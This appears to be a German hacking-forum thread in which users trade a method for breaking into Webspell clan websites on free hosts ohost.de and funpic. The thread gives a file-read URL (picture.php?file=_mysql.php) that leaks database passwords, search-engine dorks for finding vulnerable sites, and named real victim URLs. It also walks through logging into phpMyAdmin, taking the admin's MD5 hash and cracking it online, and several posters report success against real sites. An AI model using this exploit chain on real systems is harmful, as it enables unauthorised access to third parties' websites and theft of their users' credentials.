[b]Webspell Clanpage auf Funpic FTP "hacken"

[Warcraft]

http://thonic.th.ohost.de/picture?file=_mysql.php
http://marineinfantery.ma.ohost.de/p...ile=_mysql.php
http://teamholdstill.te.ohost.de/pic...ile=_mysql.php



Diese Seite ist leider nicht verfügbar.
Richte auch du Deine kostenlose Homepage beim kostenlosen Webspace bei ohost.de ein.


kA was ich falsch mach -.-

[dioXin]

bei mir gehen die passwörter nirgendwo, nicht bei phpmyadmin und im ftp auch nicht

[VANTANA-B]

http://blackdiablo.bl.ohost.de/ der link geht gibt mir sorger die Pws

ust aber ich kann mich auf ftp nicht einlogen

[Lump]

ich weiss garnich was ihr hab!
das exploit funkzt bei mir perfekt!
habs bei 10 seiten versucht und bei 5 hats geklapt

Code:

inurl:ohost "Webspell"

oder

Code:

inurl:funpic "Webspell"

das müsste bei jedem funkzen!

http://blackdiablo.bl.ohost.de/ der link geht gibt mir sorger die Pws

ust aber ich kann mich auf ftp nicht einlogen

das liegt daran das er nich das gleiche pw hat!
logge dich bei http://phpmyadmin.ohost.de ein und check die user datei!
dann haste schonmal den hash für alle die auf der page angemeldet sind!
der erste is der admin! gehe auf md5cracker.de und gib den hash da ein.
schon haste admin pw :wink:

[TheBastart]

nice tutorial... bei mir hats geklappt... n1

[bizzit]

hab jez 5 bis 10 seiten probiert.. 0 funzen

[dr0p]

lol ich habe es grade nochmal an 3 seiten aus langerweile ausprobiert...und hat geklappt!

[bizzit]

gibst du einfach:

Code:

/picture?file=_mysql.php

am ende der url ein oder was?

[dr0p]

gibst du einfach:

Code:

/picture?file=_mysql.php

am ende der url ein oder was?

omfGGGGGG

Code:

picture.php?file=_mysql.php

du hast das php vergessen!

[Uncle Sam]

Ich hab es bei einer ausprobiert, klappt wunderbar, danke HaxXxor^^
MFG
Uncle Sam